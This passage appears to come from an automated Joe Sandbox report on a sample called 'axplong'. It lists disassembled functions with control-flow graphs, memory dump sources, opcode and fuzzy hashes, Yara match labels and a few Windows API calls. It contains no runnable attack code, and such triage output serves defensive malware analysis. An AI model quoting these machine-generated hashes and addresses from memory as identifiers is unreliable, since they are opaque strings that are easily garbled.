                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 57a053e113f5d334756acaefd7678fd26d082a3da7924eaabba976ed38b20399
                    • Instruction ID: 9386aa6e81423a1e7e2c44b20c8d80c54fee21128bdb88b654613bf169df4c2f
                    • Opcode Fuzzy Hash: 57a053e113f5d334756acaefd7678fd26d082a3da7924eaabba976ed38b20399
                    • Instruction Fuzzy Hash: 53512770D003589BEB24EF68DD497EDB7759B46300F504299F818A73C2EF395E808BA2
                    Function 00766C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1421 766c99-766ca5 1422 766ca7-766cc3 call 767430 call 767443 call 766b8a 1421->1422 1423 766cc4-766ce8 call 764020 1421->1423 1428 766d06-766d28 CreateFileW 1423->1428 1429 766cea-766d04 call 767430 call 767443 call 766b8a 1423->1429 1432 766d2a-766d2e call 766e01 1428->1432 1433 766d38-766d3f call 766d77 1428->1433 1453 766d72-766d76 1429->1453 1440 766d33-766d36 1432->1440 1444 766d40-766d42 1433->1444 1440->1444 1445 766d64-766d67 1444->1445 1446 766d44-766d61 call 764020 1444->1446 1449 766d70 1445->1449 1450 766d69-766d6f 1445->1450 1446->1445 1449->1453 1450->1449
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29aa5cea1776ec22b8f5d77925e5ca1589dc533a6258ec1d241e22e496328f1a
                    • Instruction ID: 551971a691f0b195b9eb2bf4da0df2137325629349fc100056cf8c99387dbae1
                    • Opcode Fuzzy Hash: 29aa5cea1776ec22b8f5d77925e5ca1589dc533a6258ec1d241e22e496328f1a
                    • Instruction Fuzzy Hash: BA21F871A05208FAEF117B649C4AB9F3B299F427B8F600314FD253B1D1DB785E0596A1
                    Function 00766F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1455 766f71-766f87 1456 766f97-766fa7 1455->1456 1457 766f89-766f8d 1455->1457 1461 766fe7-766fea 1456->1461 1462 766fa9-766fbb SystemTimeToTzSpecificLocalTime 1456->1462 1457->1456 1458 766f8f-766f95 1457->1458 1459 766fec-766ff7 call 74cf21 1458->1459 1461->1459 1462->1461 1464 766fbd-766fdd call 766ff8 1462->1464 1467 766fe2-766fe5 1464->1467 1467->1459
                    APIs
                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00766FB3
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$LocalSpecificSystem
                    • String ID:
                    • API String ID: 2574697306-0
                    • Opcode ID: 3d0aa8a31876fd670ba15d0f357beedc118e3fa19951c7cc6768598defcbb5ba
                    • Instruction ID: 5e5924eb2f7b3b7b05a304d019ddc00c9d970235afb740f69a450c199e9a11fa
                    • Opcode Fuzzy Hash: 3d0aa8a31876fd670ba15d0f357beedc118e3fa19951c7cc6768598defcbb5ba
                    • Instruction Fuzzy Hash: 4D11F17690020CBBDB10DED5D944EDFB7BCAF48310F505266E912E6181E734EB45CB61
                    Function 00746AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 057199cc2ce8aa9d60e17bba5164080899379056b61caf419f5f63d38a73ba7e
                    • Instruction ID: 8cfa3ea1c8b1317f7f18d33f3b3a37c6f1c1f7c15e0e9641461eb7501bcbcc19
                    • Opcode Fuzzy Hash: 057199cc2ce8aa9d60e17bba5164080899379056b61caf419f5f63d38a73ba7e
                    • Instruction Fuzzy Hash: D6F0D6B1A00508FBC600BBA89C0A71DBB69A707760F904348E811672E2DB3C590587D3
                    Function 051601A8 Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1543 51601a8-51602e2 call 51602b0 1560 51602e9-5160358 1543->1560
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d3ce13f52e68776fbc09a6596cf4504b449d21bc1683b88fa80adf9c3af40645
                    • Instruction ID: b952f9b433819b3256d5c5fae2aa7c3f361dfcded49fd60d6f18dd9d89458f6a
                    • Opcode Fuzzy Hash: d3ce13f52e68776fbc09a6596cf4504b449d21bc1683b88fa80adf9c3af40645
                    • Instruction Fuzzy Hash: 7A1138A704C200EFD76EC585564CA7A7B6BFB9E330732402EF4138B242E3A449758162
                    Function 051601D4 Relevance: .1, Instructions: 72COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8ecb29baca66dea88f54446de10667160a5c9006ff27d1e8cf0c6d15e0535800
                    • Instruction ID: e2defa32f574db62a29bc4c254c8438c750cef1d457928b93afd63d6500e1f15
                    • Opcode Fuzzy Hash: 8ecb29baca66dea88f54446de10667160a5c9006ff27d1e8cf0c6d15e0535800
                    • Instruction Fuzzy Hash: 6D0166AB04C200EFC77ED9456A4CABA7B67BF6E330773805DF4439B291E3A419748291
                    Function 051601F1 Relevance: .1, Instructions: 68COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 74a9c0cd8f88b487b0699493de6c620f3ac46ae6582a95c7fab43c2e09e42398
                    • Instruction ID: d5b997f0e0a20a20f0712d03d63c26a29dd5e4d1bd53c3e8de38313f61849fe1
                    • Opcode Fuzzy Hash: 74a9c0cd8f88b487b0699493de6c620f3ac46ae6582a95c7fab43c2e09e42398
                    • Instruction Fuzzy Hash: DB0149B705C601EFC6BFC945554CE7A7B67BF6E231723805DE4038B261E3A45970C152
                    Function 0516020E Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c20f66237291e68da3ff5965b3b7dfe92c1ab975a346c5271a73910c3dba395
                    • Instruction ID: 7289cac82a7d82a1f0aca5700b9606453f19835074050a73c1e8f1cb1d80cc42
                    • Opcode Fuzzy Hash: 9c20f66237291e68da3ff5965b3b7dfe92c1ab975a346c5271a73910c3dba395
                    • Instruction Fuzzy Hash: D10185BB40C100EFCB7BE565254DAB97B23BEAF230767442EF4438B652E3652178D212
                    Function 05160234 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 94a3098c4a6006746244ab539ec2217c3467e6ee3be797468f2fa5673c6aa1d0
                    • Instruction ID: e0601ab93e9be729b3a39cf44fdba5d53fced5187a6ea6eb0203d27856d8280a
                    • Opcode Fuzzy Hash: 94a3098c4a6006746244ab539ec2217c3467e6ee3be797468f2fa5673c6aa1d0
                    • Instruction Fuzzy Hash: EAF0EBAB04C101EFC3BBD555128CA787B27BFAE230B73481EF0038B251E3A015B08113
                    Function 051602C2 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6c3b79fef734fdf3cba844baf60ba93a0c62ba6f63c20d267472ab32bb6579fe
                    • Instruction ID: 750cc2d85d7af185a742d20b3f33d4fd0fb02acd998e1255fe3ffdcc76288706
                    • Opcode Fuzzy Hash: 6c3b79fef734fdf3cba844baf60ba93a0c62ba6f63c20d267472ab32bb6579fe
                    • Instruction Fuzzy Hash: 5CF072A380C240DFD7BAC156418CA38BB53AF6F234B22055EE0834B292E3A800B48203
                    Function 051602EE Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5ac0ca3c56b0eee5c8dece7f79339c8f12ddcc18899230cab695480267ec6399
                    • Instruction ID: 92b34cc6b74b8ac44ad9eb3d2f55a6fef72d11f4f708c5cdf6e77b84a8df5bc2
                    • Opcode Fuzzy Hash: 5ac0ca3c56b0eee5c8dece7f79339c8f12ddcc18899230cab695480267ec6399
                    • Instruction Fuzzy Hash: E4F0C05B04C640DFC36BD15B128CB717F17BF2F231772015EE1831B5A2A3D914B49252
                    Function 05160282 Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e094821ced8b052b429bcf33d5ce54dc0f4b10679e915999a4e3bed754d675e
                    • Instruction ID: 9614d3ae214c484ef5bd4250bdeca50961f4def97a13f890ab32fd22f3bf9d47
                    • Opcode Fuzzy Hash: 7e094821ced8b052b429bcf33d5ce54dc0f4b10679e915999a4e3bed754d675e
                    • Instruction Fuzzy Hash: 85F08BE7048640EFC2A7D259969D7F1BB566F2F234722056DA4435B2D3939520B5C202
                    Function 05160258 Relevance: .0, Instructions: 41COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 66ac89807bd886ea666c9abce6df6bc636a18199c50e5e922e6492dada525cee
                    • Instruction ID: f9ac45274220a5e36be049251ff3a1bf5e23da4cd96e60144c20314a3eb22c03
                    • Opcode Fuzzy Hash: 66ac89807bd886ea666c9abce6df6bc636a18199c50e5e922e6492dada525cee
                    • Instruction Fuzzy Hash: 53F052AB44C200DFC2BAC54A228DA38BB13BF6F230773855EE0438B291A3A414B48113
                    Function 05160252 Relevance: .0, Instructions: 34COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d16ce5cd97ee40ced74af8b9f880822aae26b12fda6a9d81bd8d7f3136994b1
                    • Instruction ID: 758331cd314a1c3a39954fe026b1bd14f45b49e019eb96901e0f77e25ad13942
                    • Opcode Fuzzy Hash: 3d16ce5cd97ee40ced74af8b9f880822aae26b12fda6a9d81bd8d7f3136994b1
                    • Instruction Fuzzy Hash: AFE0A2AB48C200DFC3BAC28A024DA70BA13BF2F231373024EE0034B2A2538814B4D222
                    Function 0516031A Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ac28595cf912d67d3152e3e16127b70a948061ab9f57548fff73053c7b4a056
                    • Instruction ID: 516586e48ae9833fded6b651d2c168b546953f9708aa6832f1ff7167ceeefb6a
                    • Opcode Fuzzy Hash: 1ac28595cf912d67d3152e3e16127b70a948061ab9f57548fff73053c7b4a056
                    • Instruction Fuzzy Hash: 39E0C04704C250CFC277C165421DAF22F476B3F1323278111E047D69E3834D19B8D252
                    Function 051602B0 Relevance: .0, Instructions: 28COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3019009769.0000000005160000.00000040.00001000.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_5160000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 71b46f50c8db56672b82cd3a856d90afebc373aeaf77665b3bb6ea55197169b5
                    • Instruction ID: c817310747022956aba91fcf65ea3108ca191de2f1f2be0a90fcff2ec462d15f
                    • Opcode Fuzzy Hash: 71b46f50c8db56672b82cd3a856d90afebc373aeaf77665b3bb6ea55197169b5
                    • Instruction Fuzzy Hash: A1E02BDB48C210DFC1FFD186135DB706A477B7F1323B34216A00B5BBE213891AB89111

                    Non-executed Functions

                    Function 00773068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: bf7d95c37166d9c42f68f02500fc01dda31090cb00151672483caa01a91fd6f8
                    • Instruction ID: 5c7d0aa2b7c205575b544c5a5490682bffa7a11dae9c6351ab1d07c2af11efd4
                    • Opcode Fuzzy Hash: bf7d95c37166d9c42f68f02500fc01dda31090cb00151672483caa01a91fd6f8
                    • Instruction Fuzzy Hash: 34C24C71E046288FDF25CE28DD447E9B3B5EB48384F1481EAD84EE7241E779AE819F41
                    Function 00772BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction ID: 8d671e69bc5bb6c65c41c700559e3742d88c0762123bd662ac411d672d7e15cc
                    • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction Fuzzy Hash: A1F13071E012199FDF14CFA8C8806ADB7B1FF48354F25826AD829A7345D735AE42CB90
                    Function 0074D312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0073247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: 'ktd+y$'ktd+y
                    • API String ID: 2659868963-2254888460
                    • Opcode ID: 131caa5c6a75e1db3aa142f8a91ff4f0cf6b4a7e87bcafd2bc658deb3188b606
                    • Instruction ID: 3f5efd95f58717d29b0a76e4c37faa8d0602e4310d032f04cd7ab56d264c91b5
                    • Opcode Fuzzy Hash: 131caa5c6a75e1db3aa142f8a91ff4f0cf6b4a7e87bcafd2bc658deb3188b606
                    • Instruction Fuzzy Hash: 305178B1E006159FDB25CF58D8856AABBF0FB08310F24C56BE845EB251D7789D42CF54
                    Function 0074CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,0074CE82,?,?,?,?,0074CEB7,?,?,?,?,?,?,0074C42D,?,00000001), ref: 0074CB33
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FilePreciseSystem
                    • String ID:
                    • API String ID: 1802150274-0
                    • Opcode ID: e84935c24c7dcf0aa820a4faba437fc617b3aae77a3478d279b1e8819e77cd8f
                    • Instruction ID: d778846981c88244e8e5428d19d04664dda7db8385baefd5a4c6c7a155f4a397
                    • Opcode Fuzzy Hash: e84935c24c7dcf0aa820a4faba437fc617b3aae77a3478d279b1e8819e77cd8f
                    • Instruction Fuzzy Hash: 98D02232A4343893CA433BA0AC088ACBB18DE04BA07004122EC0463530CB5C5C418BD8
                    Function 00767D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                    Download Yara Rule
